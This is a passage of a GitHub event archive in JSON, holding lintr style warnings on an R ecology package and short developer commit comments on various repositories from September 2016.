tabs.**\n```r\n​\tcomm_spec_matrix <- matrix(rep(0, (n_communities * pool_richness)),\n^\n```\n[R/generateArtificialData.R:25:24:](https://github.com/thijsjanzen/STEPCAM/blob/be4a45a496048d216670492c58e3829f8cd5b1a0/R/generateArtificialData.R#L25) *style:* **Put spaces around all infix operators.**\n```r\n​\ttraits_pool_df <- as.data.frame(columns)\n                      ~^~~\n```\n[R/generateArtificialData.R:26:31:](https://github.com/thijsjanzen/STEPCAM/blob/be4a45a496048d216670492c58e3829f8cd5b1a0/R/generateArtificialData.R#L26) *style:* **Put spaces around all infix operators.**\n```r\n​\tnames(traits_pool_df) <- row1\n                             ~^~~\n```\n[R/generateArtificialData.R:28:1:](https://github.com/thijsjanzen/STEPCAM/blob/be4a45a496048d216670492c58e3829f8cd5b1a0/R/generateArtificialData.R#L28) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\toccurence <- 10^rnorm(pool_richness, mean = 0, sd = occurence_distribution)\n^\n```\n[R/generateArtificialData.R:28:26:](https://github.com/thijsjanzen/STEPCAM/blob/be4a45a496048d216670492c58e3829f8cd5b1a0/R/generateArtificialData.R#L28) *style:* **Put spaces around all infix operators.**\n```r\n​\tcomm_spec_matrix <- matrix(rep(0, (n_communities * pool_richness)),\n                        ~^~~\n```\n[R/generateArtificialData.R:28:43:](https://github.com/thijsjanzen/STEPCAM/blob/be4a45a496048d216670492c58e3829f8cd5b1a0/R/generateArtificialData.R#L28) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\tcomm_spec_matrix <- matrix(rep(0, (n_communities * pool_richness)),\n                                          ^\n```\n[R/generateArtificialData.R:28:58:](https://github.com/thijsjanzen/STEPCAM/blob/be4a45a496048d216670492c58e3829f8cd5b1a0/R/generateArtificialData.R#L28) *style:* **Put spaces around all infix operators.**\n```r\n​\tcomm_spec_matrix <- matrix(rep(0, (n_communities * pool_richness)),\n                                                        ~^~\n```\n[R/generateArtificialData.R:30:1:](https://github.com/thijsjanzen/STEPCAM/blob/be4a45a496048d216670492c58e3829f8cd5b1a0/R/generateArtificialData.R#L30) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\trichness_values <- round((rnorm(n_communities, mean = 0, sd = 1) * (sd_richness * pool_richness) +\n^\n```\n[R/generateArtificialData.R:31:19:](https://github.com/thijsjanzen/STEPCAM/blob/be4a45a496048d216670492c58e3829f8cd5b1a0/R/generateArtificialData.R#L31) *style:* **Put spaces around all infix operators.**\n```r\n​\toccurence <- 10^rnorm(pool_richness, mean = 0, sd = occurence_distribution)\n                 ~^~~\n```\n[R/generateArtificialData.R:31:24:](https://github.com/thijsjanzen/STEPCAM/blob/be4a45a496048d216670492c58e3829f8cd5b1a0/R/generateArtificialData.R#L31) *style:* **Put spaces around all infix operators.**\n```r\n​\toccurence <- 10^rnorm(pool_richness, mean = 0, sd = occurence_distribution)\n                      ~^~\n```\n[R/generateArtificialData.R:31:51:](https://github.com/thijsjanzen/STEPCAM/blob/be4a45a496048d216670492c58e3829f8cd5b1a0/R/generateArtificialData.R#L31) *style:* **Put spaces around all infix operators.**\n```r\n​\toccurence <- 10^rnorm(pool_richness, mean = 0, sd = occurence_distribution)\n                                                 ~^~\n```\n[R/generateArtificialData.R:31:59:](https://github.com/thijsjanzen/STEPCAM/blob/be4a45a496048d216670492c58e3829f8cd5b1a0/R/generateArtificialData.R#L31) *style:* **Put spaces around all infix operators.**\n```r\n​\toccurence <- 10^rnorm(pool_richness, mean = 0, sd = occurence_distribution)\n                                                         ~^~\n```\n[R/generateArtificialData.R:32:1:](https://github.com/thijsjanzen/STEPCAM/blob/be4a45a496048d216670492c58e3829f8cd5b1a0/R/generateArtificialData.R#L32) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\trichness_values[which(richness_values > pool_richness)] <- pool_richness\n^\n```\n[R/generateArtificialData.R:33:1:](https://github.com/thijsjanzen/STEPCAM/blob/be4a45a496048d216670492c58e3829f8cd5b1a0/R/generateArtificialData.R#L33) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\trichness_values[which(richness_values < 0)] <- 0\n^\n```\n[R/generateArtificialData.R:33:1:](https://github.com/thijsjanzen/STEPCAM/blob/be4a45a496048d216670492c58e3829f8cd5b1a0/R/generateArtificialData.R#L33) *style:* **lines should not be more than 80 characters.**\n```r\n​\trichness_values <- round((rnorm(n_communities, mean = 0, sd = 1) * (sd_richness * pool_richness) +\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/generateArtificialData.R:33:25:](https://github.com/thijsjanzen/STEPCAM/blob/be4a45a496048d216670492c58e3829f8cd5b1a0/R/generateArtificialData.R#L33) *style:* **Put spaces around all infix operators.**\n```r\n​\trichness_values <- round((rnorm(n_communities, mean = 0, sd = 1) * (sd_richness * pool_richness) +\n                       ~^~~\n```\n[R/generateArtificialData.R:33:34:](https://github.com/thijsjanzen/STEPCAM/blob/be4a45a496048d216670492c58e3829f8cd5b1a0/R/generateArtificialData.R#L33) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\trichness_values <- round((rnorm(n_communities, mean = 0, sd = 1) * (sd_richness * pool_richness) +\n                                 ^\n```\n[R/generateArtificialData.R:33:61:](https://github.com/thijsjanzen/STEPCAM/blob/be4a45a496048d216670492c58e3829f8cd5b1a0/R/generateArtificialData.R#L33) *style:* **Put spaces around all infix operators.**\n```r\n​\trichness_values <- round((rnorm(n_communities, mean = 0, sd = 1) * (sd_richness * pool_richness) +\n                                                           ~^~\n```\n[R/generateArtificialData.R:33:69:](https://github.com/thijsjanzen/STEPCAM/blob/be4a45a496048d216670492c58e3829f8cd5b1a0/R/generateArtificialData.R#L33) *style:* **Put spaces around all infix operators.**\n```r\n​\trichness_values <- round((rnorm(n_communities, mean = 0, sd = 1) * (sd_richness * pool_richness) +\n                                                                    ^~\n```\n[R/generateArtificialData.R:33:74:](https://github.com/thijsjanzen/STEPCAM/blob/be4a45a496048d216670492c58e3829f8cd5b1a0/R/generateArtificialData.R#L33) *style:* **Put spaces around all infix operators.**\n```r\n​\trichness_values <- round((rnorm(n_communities, mean = 0, sd = 1) * (sd_richness * pool_richness) +\n                                                                        ~^~\n```\n[R/generateArtificialData.R:33:76:](https://github.com/thijsjanzen/STEPCAM/blob/be4a45a496048d216670492c58e3829f8cd5b1a0/R/generateArtificialData.R#L33) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\trichness_values <- round((rnorm(n_communities, mean = 0, sd = 1) * (sd_richness * pool_richness) +\n                                                                           ^\n```\n[R/generateArtificialData.R:33:89:](https://github.com/thijsjanzen/STEPCAM/blob/be4a45a496048d216670492c58e3829f8cd5b1a0/R/generateArtificialData.R#L33) *style:* **Put spaces around all infix operators.**\n```r\n​\trichness_values <- round((rnorm(n_communities, mean = 0, sd = 1) * (sd_richness * pool_richness) +\n                                                                                       ~^~\n```\n[R/generateArtificialData.R:34:1:](https://github.com/thijsjanzen/STEPCAM/blob/be4a45a496048d216670492c58e3829f8cd5b1a0/R/generateArtificialData.R#L34) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tfor(i in 1:n_communities){\n^\n```\n[R/generateArtificialData.R:35:1:](https://github.com/thijsjanzen/STEPCAM/blob/be4a45a496048d216670492c58e3829f8cd5b1a0/R/generateArtificialData.R#L35) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t  if(mechanism_random == T){\n^\n```\n[R/generateArtificialData.R:35:47:](https://github.com/thijsjanzen/STEPCAM/blob/be4a45a496048d216670492c58e3829f8cd5b1a0/R/generateArtificialData.R#L35) *style:* **Put spaces around all infix operators.**\n```r\n​\trichness_values[which(richness_values > pool_richness)] <- pool_richness\n                                             ~^~\n```\n[R/generateArtificialData.R:35:65:](https://github.com/thijsjanzen/STEPCAM/blob/be4a45a496048d216670492c58e3829f8cd5b1a0/R/generateArtificialData.R#L35) *style:* **Put spaces around all infix operators.**\n```r\n​\trichness_values[which(richness_values > pool_richness)] <- pool_richness\n                                                               ~^~~\n```\n[R/generateArtificialData.R:36:1:](https://github.com/thijsjanzen/STEPCAM/blob/be4a45a496048d216670492c58e3829f8cd5b1a0/R/generateArtificialData.R#L36) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    present_species <- sample(c(1:pool_richness), richness_values[i],\n^\n```\n[R/generateArtificialData.R:36:47:](https://github.com/thijsjanzen/STEPCAM/blob/be4a45a496048d216670492c58e3829f8cd5b1a0/R/generateArtificialData.R#L36) *style:* **Put spaces around all infix operators.**\n```r\n​\trichness_values[which(richness_values < 0)] <- 0\n                                             ~^\n```\n[R/generateArtificialData.R:37:12:](https://github.com/thijsjanzen/STEPCAM/blob/be4a45a496048d216670492c58e3829f8cd5b1a0/R/generateArtificialData.R#L37) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\tfor(i in 1:n_communities){\n           ^\n```\n[R/generateArtificialData.R:38:1:](https://github.com/thijsjanzen/STEPCAM/blob/be4a45a496048d216670492c58e3829f8cd5b1a0/R/generateArtificialData.R#L38) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t  }else{\n^\n```\n[R/generateArtificialData.R:38:13:](https://github.com/thijsjanzen/STEPCAM/blob/be4a45a496048d216670492c58e3829f8cd5b1a0/R/generateArtificialData.R#L38) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t  if(mechanism_random == T){\n            ^\n```\n[R/generateArtificialData.R:39:1:](https://github.com/thijsjanzen/STEPCAM/blob/be4a45a496048d216670492c58e3829f8cd5b1a0/R/generateArtificialData.R#L39) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    opt_traits <- rnorm(n_traits, mean = 0, sd = 1)\n^\n```\n[R/generateArtificialData.R:39:29:](https://github.com/thijsjanzen/STEPCAM/blob/be4a45a496048d216670492c58e3829f8cd5b1a0/R/generateArtificialData.R#L39) *style:* **Put spaces around all infix operators.**\n```r\n​\t    present_species <- sample(c(1:pool_richness), richness_values[i],\n                           ~^~~\n```\n[R/generateArtificialData.R:40:1:](https://github.com/thijsjanzen/STEPCAM/blob/be4a45a496048d216670492c58e3829f8cd5b1a0/R/generateArtificialData.R#L40) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    opt_traits_matrix <- c()\n^\n```\n[R/generateArtificialData.R:41:1:](https://github.com/thijsjanzen/STEPCAM/blob/be4a45a496048d216670492c58e3829f8cd5b1a0/R/generateArtificialData.R#L41) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    for(j in 1:n_traits){\n^\n```\n[R/generateArtificialData.R:42:1:](https://github.com/thijsjanzen/STEPCAM/blob/be4a45a496048d216670492c58e3829f8cd5b1a0/R/generateArtificialData.R#L42) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t      for(k in 1:pool_richness){\n^\n```\n[R/generateArtificialData.R:42:24:](https://github.com/thijsjanzen/STEPCAM/blob/be4a45a496048d216670492c58e3829f8cd5b1a0/R/generateArtificialData.R#L42) *style:* **Put spaces around all infix operators.**\n```r\n​\t    opt_traits <- rnorm(n_traits, mean = 0, sd = 1)\n                      ~^~~\n```\n[R/generateArtificialData.R:42:48:](https://github.com/thijsjanzen/STEPCAM/blob/be4a45a496048d216670492c58e3829f8cd5b1a0/R/generateArtificialData.R#L42) *style:* **Put spaces around all infix operators.**\n```r\n​\t    opt_traits <- rnorm(n_traits, mean = 0, sd = 1)\n                                              ~^~\n```\n[R/generateArtificialData.R:43:1:](https://github.com/thijsjanzen/STEPCAM/blob/be4a45a496048d216670492c58e3829f8cd5b1a0/R/generateArtificialData.R#L43) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t      l <- (j - 1) * pool_richness + k\n^~\n```\n[R/generateArtificialData.R:44:1:](https://github.com/thijsjanzen/STEPCAM/blob/be4a45a496048d216670492c58e3829f8cd5b1a0/R/generateArtificialData.R#L44) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t      opt_traits_matrix[l] <- opt_traits[j]\n^~\n```\n[R/generateArtificialData.R:44:16:](https://github.com/thijsjanzen/STEPCAM/blob/be4a45a496048d216670492c58e3829f8cd5b1a0/R/generateArtificialData.R#L44) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t    for(j in 1:n_traits){\n               ^\n```\n[R/generateArtificialData.R:45:1:](https://github.com/thijsjanzen/STEPCAM/blob/be4a45a496048d216670492c58e3829f8cd5b1a0/R/generateArtificialData.R#L45) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t      }\n^\n```\n[R/generateArtificialData.R:45:18:](https://github.com/thijsjanzen/STEPCAM/blob/be4a45a496048d216670492c58e3829f8cd5b1a0/R/generateArtificialData.R#L45) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t      for(k in 1:pool_richness){\n                 ^\n```\n[R/generateArtificialData.R:46:1:](https://github.com/thijsjanzen/STEPCAM/blob/be4a45a496048d216670492c58e3829f8cd5b1a0/R/generateArtificialData.R#L46) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    }\n^\n```\n[R/generateArtificialData.R:46:25:](https://github.com/thijsjanzen/STEPCAM/blob/be4a45a496048d216670492c58e3829f8cd5b1a0/R/generateArtificialData.R#L46) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t      l <- (j - 1) * pool_richness + k\n                       ~^~~\n```\n[R/generateArtificialData.R:46:28:](https://github.com/thijsjanzen/STEPCAM/blob/be4a45a496048d216670492c58e3829f8cd5b1a0/R/generateArtificialData.R#L46) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t\t      l <- (j - 1) * pool_richness + k\n                           ^\n```\n[R/generateArtificialData.R:46:31:](https://github.com/thijsjanzen/STEPCAM/blob/be4a45a496048d216670492c58e3829f8cd5b1a0/R/generateArtificialData.R#L46) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t      l <- (j - 1) * pool_richness + k\n                             ~^~\n```\n[R/generateArtificialData.R:46:36:](https://github.com/thijsjanzen/STEPCAM/blob/be4a45a496048d216670492c58e3829f8cd5b1a0/R/generateArtificialData.R#L46) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t      l <- (j - 1) * pool_richness + k\n                                  ~^\n```\n[R/generateArtificialData.R:47:1:](https://github.com/thijsjanzen/STEPCAM/blob/be4a45a496048d216670492c58e3829f8cd5b1a0/R/generateArtificialData.R#L47) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    opt_traits_matrix <- matrix(opt_traits_matrix, ncol = n_traits)\n^\n```\n[R/generateArtificialData.R:47:44:](https://github.com/thijsjanzen/STEPCAM/blob/be4a45a496048d216670492c58e3829f8cd5b1a0/R/generateArtificialData.R#L47) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t      opt_traits_matrix[l] <- opt_traits[j]\n                                          ~^~~\n```\n[R/generateArtificialData.R:48:1:](https://github.com/thijsjanzen/STEPCAM/blob/be4a45a496048d216670492c58e3829f8cd5b1a0/R/generateArtificialData.R#L48) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    traits_distances <- abs(traits_pool - opt_traits_matrix)\n^\n```\n[R/generateArtificialData.R:49:1:](https://github.com/thijsjanzen/STEPCAM/blob/be4a45a496048d216670492c58e3829f8cd5b1a0/R/generateArtificialData.R#L49) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    trait_distances_onedimen <- c()\n^\n```\n[R/generateArtificialData.R:50:1:](https://github.com/thijsjanzen/STEPCAM/blob/be4a45a496048d216670492c58e3829f8cd5b1a0/R/generateArtificialData.R#L50) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    for(m in 1:pool_richness){\n^\n```\n[R/generateArtificialData.R:50:31:](https://github.com/thijsjanzen/STEPCAM/blob/be4a45a496048d216670492c58e3829f8cd5b1a0/R/generateArtificialData.R#L50) *style:* **Put spaces around all infix operators.**\n```r\n​\t    opt_traits_matrix <- matrix(opt_traits_matrix, ncol = n_traits)\n                             ~^~~\n```\n"}},"created_at":"2016-09-18T20:41:53Z"}
{"id":"4580592053","type":"CommitCommentEvent","actor":{"login":"B--B"},"repo":{"name":"AOSP-JF-MM/platform_manifest"},"payload":{"comment":{"id":19072193,"position":null,"line":null,"path":null,"commit_id":"7d06fd62dd20655961730cfe4f1ea83adf26061c","created_at":"2016-09-18T20:42:28Z","updated_at":"2016-09-18T20:42:28Z","body":"Well, I think it's a good thing for us, I moved device handling in vendor repo for this reason, in this way we can build for multiple devices just adding the device tree repo + dependencies and handle all our supported devices in our vendor repo! Note 4 is trlte right? I took a quick look at the device tree and I think we can build aosp for that without big issue, and maybe made a unified device tree like we did for jflte devices... When we fix the unified devices issue...! "}},"created_at":"2016-09-18T20:42:28Z"}
{"id":"4580592729","type":"CommitCommentEvent","actor":{"login":"OleksandrStino"},"repo":{"name":"IF-066-Java/bugTrckr"},"payload":{"comment":{"id":19072194,"position":13,"line":44,"path":"src/main/java/com/softserverinc/edu/controllers/ProjectController.java","commit_id":"f7b1d0383cb2938a803b42cbedba0e288d5ddc5a","created_at":"2016-09-18T20:42:55Z","updated_at":"2016-09-18T20:42:55Z","body":"ok"}},"created_at":"2016-09-18T20:42:55Z"}
{"id":"4580593049","type":"CommitCommentEvent","actor":{"login":"LucDemortier"},"repo":{"name":"thisisniall/dsp"},"payload":{"comment":{"id":19072195,"position":null,"line":null,"path":null,"commit_id":"f05af4eb2a0a3580ad6aa307a79c1487f36a6878","created_at":"2016-09-18T20:43:09Z","updated_at":"2016-09-18T20:43:09Z","body":"RE: 06-linear_algebra.md\r\ncc: @lucdemortier @reshamametis @aramnath @gfsoileau @julialintern @galvin-mj\r\n\r\nHello @thisisniall \r\n\r\nIt looks like you know your linear algebra, but it would have been nice to see what results you got for the various problems in this section. By the way, it's fine to use the `numpy` methods for adding and multiplying matrices, and so on. You don't need to write your own. Note however, that all these problems are easy to solve on a piece of paper as well!\r\n\r\n👍 "}},"created_at":"2016-09-18T20:43:09Z"}
{"id":"4580594749","type":"CommitCommentEvent","actor":{"login":"mr-flibble"},"repo":{"name":"mr-flibble/DeusEx-CzechAnniversaryMod"},"payload":{"comment":{"id":19072196,"position":null,"line":null,"path":null,"commit_id":"ddd956cf54ced0bb5b5d1d3a1bd34fe11822623f","created_at":"2016-09-18T20:44:21Z","updated_at":"2016-09-18T20:44:21Z","body":"oprava důležitého souboru:)"}},"created_at":"2016-09-18T20:44:21Z"}
{"id":"4580597754","type":"CommitCommentEvent","actor":{"login":"egeldenhuys"},"repo":{"name":"Quantum-Sicarius/COS110"},"payload":{"comment":{"id":19072199,"position":15,"line":15,"path":"Prac5/Task2/RESULT.MD","commit_id":"9165769b6556a5962a858cfde5024bf2b545001f","created_at":"2016-09-18T20:46:18Z","updated_at":"2016-09-18T20:46:18Z","body":"The \" ’ \" character given in the specs is incorrect, fitchfork expects the \" ' \" character (The one you use to represent a character literal). The first time I also copied and pasted from the specs.\r\n\r\n[CharString.cpp:126](https://github.com/Quantum-Sicarius/COS110/blob/master/Prac5/Task2/CharString.cpp#L126)\r\n[CharString.cpp:128](https://github.com/Quantum-Sicarius/COS110/blob/master/Prac5/Task2/CharString.cpp#L128)"}},"created_at":"2016-09-18T20:46:18Z"}
{"id":"4580600909","type":"CommitCommentEvent","actor":{"login":"aelesbao"},"repo":{"name":"platanus/active_material"},"payload":{"comment":{"id":19072205,"position":null,"line":null,"path":null,"commit_id":"e2902423ea0fe81504b0baa7b74efa121f8f2cfa","created_at":"2016-09-18T20:48:10Z","updated_at":"2016-09-18T20:48:10Z","body":"@arturopuente, as @blackjid pointed out, it is a really bad attitude to change the original authors of a library and publish it on Ruby Gems. Could you please delete it so someone who finds it there doesn't download it by mistake (as I did)?"}},"created_at":"2016-09-18T20:48:10Z"}
{"id":"4580601236","type":"CommitCommentEvent","actor":{"login":"nabijaczleweli"},"repo":{"name":"reaver-project/reaverlib"},"payload":{"comment":{"id":19072206,"position":null,"line":null,"path":null,"commit_id":"04db4f6eb4f1fcae66b485d79b7f6d53a3297ea3","created_at":"2016-09-18T20:48:23Z","updated_at":"2016-09-18T20:48:23Z","body":"lol"}},"created_at":"2016-09-18T20:48:23Z"}
{"id":"4580603370","type":"CommitCommentEvent","actor":{"login":"shanhaichik"},"repo":{"name":"eigenmethod/mol"},"payload":{"comment":{"id":19072209,"position":null,"line":null,"path":null,"commit_id":"d34c53ed79dafceeb1213af29e5bd0e5580796e7","created_at":"2016-09-18T20:49:31Z","updated_at":"2016-09-18T20:49:31Z","body":"@nin--jin Это с молом? "}},"created_at":"2016-09-18T20:49:31Z"}
{"id":"4580606152","type":"CommitCommentEvent","actor":{"login":"stefansaraev"},"repo":{"name":"stefansaraev/TB"},"payload":{"comment":{"id":19072211,"position":null,"line":null,"path":null,"commit_id":"0e1c2f3829b6fe2cc74f168b303f0fa95ae55899","created_at":"2016-09-18T20:51:11Z","updated_at":"2016-09-18T20:51:11Z","body":"@sraue @lrusak in case you are interested - OE/LE is using fakeroot anyway for other things. so you can drop yet another patch.\r\n\r\nthis was in my todo list for long time. /dev/console is nowadays mandatory in initramfs.."}},"created_at":"2016-09-18T20:51:11Z"}
{"id":"4580608848","type":"CommitCommentEvent","actor":{"login":"aserratorta"},"repo":{"name":"Flexible-User-Experience/Espai-Kowo"},"payload":{"comment":{"id":19072216,"position":null,"line":null,"path":null,"commit_id":"2df2f9c1b4cfe9933087458763b92e1da272e8cb","created_at":"2016-09-18T20:52:48Z","updated_at":"2016-09-18T20:52:48Z","body":"![image](https://cloud.githubusercontent.com/assets/12971681/18619026/89bb466c-7df2-11e6-93ef-93d6fe641642.png)\r\n"}},"created_at":"2016-09-18T20:52:48Z"}
{"id":"4580609465","type":"CommitCommentEvent","actor":{"login":"KasiaLukasiewicz"},"repo":{"name":"KasiaLukasiewicz/diary"},"payload":{"comment":{"id":19072217,"position":5,"line":11,"path":"app/views/entries/index.html.erb","commit_id":"47e490ae6c4adbe3d7f31357f7f18c989f652d49","created_at":"2016-09-18T20:53:12Z","updated_at":"2016-09-18T20:53:12Z","body":"ppp"}},"created_at":"2016-09-18T20:53:12Z"}
{"id":"4580609849","type":"CommitCommentEvent","actor":{"login":"nixel2007"},"repo":{"name":"silverbulleters/vanessa-agiler"},"payload":{"comment":{"id":19072218,"position":null,"line":null,"path":null,"commit_id":"128ef968a14fa17de8f424da41ef75e035dd78dd","created_at":"2016-09-18T20:53:28Z","updated_at":"2016-09-18T20:53:28Z","body":"@alehinsasha"}},"created_at":"2016-09-18T20:53:28Z"}
{"id":"4580611633","type":"CommitCommentEvent","actor":{"login":"nin-jin"},"repo":{"name":"eigenmethod/mol"},"payload":{"comment":{"id":19072225,"position":null,"line":null,"path":null,"commit_id":"d34c53ed79dafceeb1213af29e5bd0e5580796e7","created_at":"2016-09-18T20:54:34Z","updated_at":"2016-09-18T20:54:34Z","body":"Конечно."}},"created_at":"2016-09-18T20:54:34Z"}
{"id":"4580614453","type":"CommitCommentEvent","actor":{"login":"dlfivefifty"},"repo":{"name":"ApproxFun/ApproxFun.jl"},"payload":{"comment":{"id":19072232,"position":null,"line":null,"path":null,"commit_id":"b40ebffb429af86394b1e034f61481ed3654e8bf","created_at":"2016-09-18T20:56:25Z","updated_at":"2016-09-18T20:56:25Z","body":"Sorry, it was fixed in the next commit"}},"created_at":"2016-09-18T20:56:25Z"}
{"id":"4580617458","type":"CommitCommentEvent","actor":{"login":"Sokureo"},"repo":{"name":"Sokureo/sophomore"},"payload":{"comment":{"id":19072240,"position":null,"line":null,"path":null,"commit_id":"a18837d8bff2c15efe4b3173b222bc770dde31b5","created_at":"2016-09-18T20:58:23Z","updated_at":"2016-09-18T20:58:23Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;6tF65LgW&#x2F;10-hometask\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> hometask</a>"}},"created_at":"2016-09-18T20:58:23Z"}
{"id":"4580618186","type":"CommitCommentEvent","actor":{"login":"sgrillon14"},"repo":{"name":"sgrillon14/cucumber-jvm"},"payload":{"comment":{"id":19072243,"position":null,"line":null,"path":null,"commit_id":"399803f12a172c38fa9a184dd5c07c92c572ac40","created_at":"2016-09-18T20:58:50Z","updated_at":"2016-09-18T20:58:50Z","body":"I tested this development with the Gherkin following script:\r\n\r\n```\r\n@hello \r\nFeature: hello (Function to validate the environment.) \r\n\r\n\tScenario Outline: Function to validate the environment.\r\n\t\tGiven me a hello, please. Best Regards '<author>'.\r\n\t\tGiven me a hello, please. Best Regards '<author>'.\r\n\t\t    |key|expected|actual|\r\n\t\tGiven me a hello, please. Best Regards '<author>'.\r\n\t\t    |key|expected|actual|\r\n\t\t\t  |zip|35000|<zip>|\r\n\t\t\t  |city|Rennes|<city>|\r\n\t\t\t  \r\n\t\tGiven me a bye, please. Best Regards '<author>'.\r\n\t\tGiven me a bye, please. Best Regards '<author>'.\r\n\t\t\t  |zip|<zip>|\r\n\t\t\t  |city|<city>|\r\n\t\t\t  \r\n\t\tGiven me a cat, please. Best Regards '<author>'.\r\n\t\t\r\n\tExamples:\r\n\t#Begin Examples#\r\n\t|author|zip|city|\r\n\t|Jenkins Q1|35000|Rennes|\r\n\t|Jenkins Q2|35000|Rennes|\r\n\t#End Examples#\r\n```"}},"created_at":"2016-09-18T20:58:50Z"}
{"id":"4580622916","type":"CommitCommentEvent","actor":{"login":"psycofdj"},"repo":{"name":"psycofdj/xtdcpp"},"payload":{"comment":{"id":19072252,"position":null,"line":null,"path":null,"commit_id":"0a08129ec5c6fb6b204c81fa6de3ae2f58df6656","created_at":"2016-09-18T21:01:30Z","updated_at":"2016-09-18T21:01:30Z","body":"Build report #160890128 for sha 0a08129ec5c6fb6b204c81fa6de3ae2f58df6656:\n\n[![UnitTests](https://img.shields.io/badge/unittests-passed%20%283/3%29%20-brightgreen.svg)](#)\n[![Coverage](https://img.shields.io/badge/coverage-14.07%20%25-yellow.svg)](#)\n[![Cppcheck](https://img.shields.io/badge/cppcheck-0%20error%28s%29-brightgreen.svg)](#)\n[![Code statistics](https://img.shields.io/badge/cloc-2370%20/%209922%20%2823.89%20%25%29-yellow.svg)](#)\n[![Documentation](https://img.shields.io/badge/doc-success-brightgreen.svg)](#)\n[![Documentation coverage](https://img.shields.io/badge/doc--coverage-19.75%20%25-yellow.svg)](#)\n"}},"created_at":"2016-09-18T21:01:30Z"}
{"id":"4580623372","type":"CommitCommentEvent","actor":{"login":"LucDemortier"},"repo":{"name":"neokt/dsp"},"payload":{"comment":{"id":19072253,"position":null,"line":null,"path":null,"commit_id":"2ad568565632b91cc2338f03b06fad09bffe1e48","created_at":"2016-09-18T21:01:48Z","updated_at":"2016-09-18T21:01:48Z","body":"RE: 05a-python.md\r\ncc: @lucdemortier @reshamametis @aramnath @gfsoileau @julialintern @galvin-mj\r\n\r\nHello @neokt \r\n\r\nGood work on the Python problems! Nice, concise code!\r\n\r\n👍 "}},"created_at":"2016-09-18T21:01:48Z"}
{"id":"4580623996","type":"CommitCommentEvent","actor":{"login":"clman94"},"repo":{"name":"clman94/Wolf-Gang-Engine"},"payload":{"comment":{"id":19072254,"position":null,"line":null,"path":null,"commit_id":"24ebb42c58ee8274342e23904e8479db33842416","created_at":"2016-09-18T21:02:09Z","updated_at":"2016-09-18T21:02:09Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;2HZ3l7cW&#x2F;4-optimizations-when-needed\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Optimizations (when needed)</a>"}},"created_at":"2016-09-18T21:02:09Z"}
{"id":"4580626861","type":"CommitCommentEvent","actor":{"login":"PabbleDabble"},"repo":{"name":"PabbleDabble/pabbledabble.github.io"},"payload":{"comment":{"id":19072260,"position":null,"line":null,"path":null,"commit_id":"43f8961c4226333d2d575f552e287747c17bbc5f","created_at":"2016-09-18T21:03:15Z","updated_at":"2016-09-18T21:03:15Z","body":"Committing via github.com to make sure all changes went through for submission"}},"created_at":"2016-09-18T21:03:15Z"}
{"id":"4580628504","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"thijsjanzen/STEPCAM"},"payload":{"comment":{"id":19072263,"position":null,"line":null,"path":null,"commit_id":"c1b9ce694293fc698308ec85d252428131accd13","created_at":"2016-09-18T21:04:10Z","updated_at":"2016-09-18T21:04:10Z","body":"[R/ABC_SMC.R:2:1:](https://github.com/thijsjanzen/STEPCAM/blob/c1b9ce694293fc698308ec85d252428131accd13/R/ABC_SMC.R#L2) *style:* **Variable and function names should be all lowercase.**\n```r\n​getRandomVals <- function(max_val)  {\n^~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:15:1:](https://github.com/thijsjanzen/STEPCAM/blob/c1b9ce694293fc698308ec85d252428131accd13/R/ABC_SMC.R#L15) *style:* **Variable and function names should be all lowercase.**\n```r\n​getFromPrevious <- function(inds, ws, disps, filts, comps)  {\n^~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:22:1:](https://github.com/thijsjanzen/STEPCAM/blob/c1b9ce694293fc698308ec85d252428131accd13/R/ABC_SMC.R#L22) *style:* **Variable and function names should be all lowercase.**\n```r\n​calculateWeight <- function(params, target, sigma,\n^~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:29:5:](https://github.com/thijsjanzen/STEPCAM/blob/c1b9ce694293fc698308ec85d252428131accd13/R/ABC_SMC.R#L29) *style:* **Variable and function names should be all lowercase.**\n```r\n​    prevP <- c(disp_vals[i], filt_vals[i], comp_vals[i])\n    